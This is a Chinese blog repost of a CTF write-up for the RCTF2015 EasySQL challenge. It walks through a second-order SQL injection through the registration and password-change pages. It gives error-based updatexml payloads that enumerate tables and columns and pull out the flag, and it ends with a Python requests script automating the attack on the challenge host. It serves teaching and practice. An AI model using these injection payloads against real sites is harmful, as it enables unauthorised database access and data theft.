NO.3-13 [RCTF2015]EasySQL

最新推荐文章于 2024-03-19 07:00:00 发布
最新推荐文章于 2024-03-19 07:00:00 发布
阅读量165 收藏
点赞数
分类专栏: BUUCTF SQL注入
原文链接:https://www.cnblogs.com/peri0d/p/11599643.html
版权

  • 打开靶机,是如下界面

  • 到注册页面,试了一下,usernameemail 处有过滤,直接 fuzz 一下哪些字符被禁了

  • 注册成功之后,有一个修改密码的功能,这里的考点应该就是二次注入

  • 它在存入数据库时进行了特殊字符的处理,但是在修改密码这里,从数据库中读取出来时,没有对数据处理

  • 注册用户名 'sss"\ ,在修改密码处的有个报错的回显

  • 可以猜出来 sql 语句应该是类似于这样子的

select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e'

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

  • 经过测试,flag 不在 flag 表中

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

  • 发现输出有长度限制

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

  • 这里就很尴尬了,所以不如 reverse 逆序输出

  • username=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#

  • 放个脚本,代表了这一题的整个流程,也记录的我的犯傻

    import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

pre = 'peri0d"'
suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
	register(paylaod)
	login(paylaod)
	changepwd()
nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RCTF2015]EasySQL
m0_63253040的博客
07-22 842
反过来就是89-9b7f-46d3-acd4-732afd1243b7}显示没有这个字段,应该是前面没有把字段名字显示完全,用正则匹配。也不行,可能是二次注入,去重新注册一下。爆real_flag_1s_her字段。随便点一个发现url可能存在注入。使用reverse函数翻转字符串。进入环境,有一个注册和登录功能。假flag去users表看看。flag应该在后面用正则匹配。有报错了,我们使用报错注入。去登录注册看看能不能注入。发现在改密码的地方会报错。改密码123为1234。...
Rctf easysql 题解
一个码农的笔记
11-21 1770
这是一个二次注入,就是用户注册之后没有做检查直接将用户名带入数据库,改密码的时候将用户名完整带出,如果我们注册heheda\ 则在修改密码的时候数据库报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right synta
xctf攻防世界easysql wp
sash1mi
02-20 1843
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
[RCTF2015]EasySQL1 题目分析与详解
2302_79800344的博客
02-25 1132
利用二次注入和报错注入处理问题。
draw.io-13.0.3-windows-no-installer.exe
05-28
draw.io-13.0.3-windows-no-installer.exe,免安装版本,打开即用
draw.io-21.6.8-windows-no-installer.rar
09-06
drawio-desktop is a diagramming and whiteboarding desktop app based on Electron that wraps the core draw.io editor.
draw.io-22.0.2-windows-installer.exe
01-29
draw.io-22.0.2-windows-installer.exe
UN Regulation No.156 - Software update and software update manag
07-08
【标题】:“UN Regulation No.156 - 软件更新和软件更新管理系统” 【描述】:“软件更新管理:UNECE R156 SUMS(Software Update Management System)” 【标签】:“R156 SUMS 软件更新” 【正文】: 联合国...
draw.io-14.5.1-windows-no-installer.exe
04-13
draw.io 是一款免费的在线图表编辑工具, 可以用来编辑工作流, BPM, org charts, UML, ER图, 网络拓朴图等. 这是一个免安装版本。双击就可以使用
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1147
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
[RCTF2015]EasySQL ---不会编程的崽
最新发布
不会编程的崽的博客
03-19 895
sql注入 二次注入
RCTF2018 WP
1CHIG0的博客
05-24 1780
感觉自己好久更了。。最近看了RCTF的WEB题,感觉好多前端。。然而前端并不是很会,于是趁着这个机会稍稍补了一些前端知识。又跟着大佬的wp复现了一下,收获不少,总结一下。AMP参考了1、https://ctftime.org/writeup/101012、https://xz.aliyun.com/t/2347进入页面,首先根据提示可以给一个参数name,输入?name=ichigo得到我们得到了...
RCTF2015 welpwn: 200 writeup
fuchuangbob的专栏
06-14 2370
题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制: 0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ‘A’*24 + p64(0x
190409 逆向-RCTF2015(FlagSystem)
热门推荐
whklhhhh的博客
04-09 2万+
想起来前段时间搞了JEB3的泄露版,找了个安卓题来试试手 结果发现这题目也挺有意思的23333 提供的题目文件是一个二进制,十六进制查看器发现头部标着ANDROID BACKUP,显然就是个应用的备份文件了 查了一下可以通过abe.jar来解包,试了一下发现解出来的文件是乱码,毫无标志 于是找了一下文件解析,发现第三行为压缩标志位,源文件为0表示未压缩,于是将它改成1,再次解包,得到两个应用 看...
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1637
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
取出css路径为:html body.no-electron.desktop.no-mobile.vsc-initialized div#__nuxt div#__layout div div.pc-layout section.el-container.is-vertical main.el-main div.id-photo div.ICbox4 div.bottom div.fileList div.imgBox div.resImg div.i-image-koutu div.crop-box img图片的链接
07-22
你可以使用JavaScript来提取CSS路径中的图片链接。以下是示例代码: ```javascript // 假设你的图片所在的元素具有如下的CSS路径 var cssPath = 'html body.no-electron.desktop.no-mobile.vsc-initialized div#__nuxt div#__layout div div.pc-layout section.el-container.is-vertical main.el-main div.id-photo div.ICbox4 div.bottom div.fileList div.imgBox div.resImg div.i-image-koutu div.crop-box img'; // 根据CSS路径选择元素 var element = document.querySelector(cssPath); // 获取图片链接 var imageUrl = element.src; console.log(imageUrl); ``` 将你的CSS路径替换到代码中的`cssPath`变量中,然后运行代码即可获取到图片链接。请注意,这段代码假设图片所在的元素只有一个,如果有多个匹配的元素,你可能需要使用`querySelectorAll`方法并遍历结果来获取每个元素的图片链接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值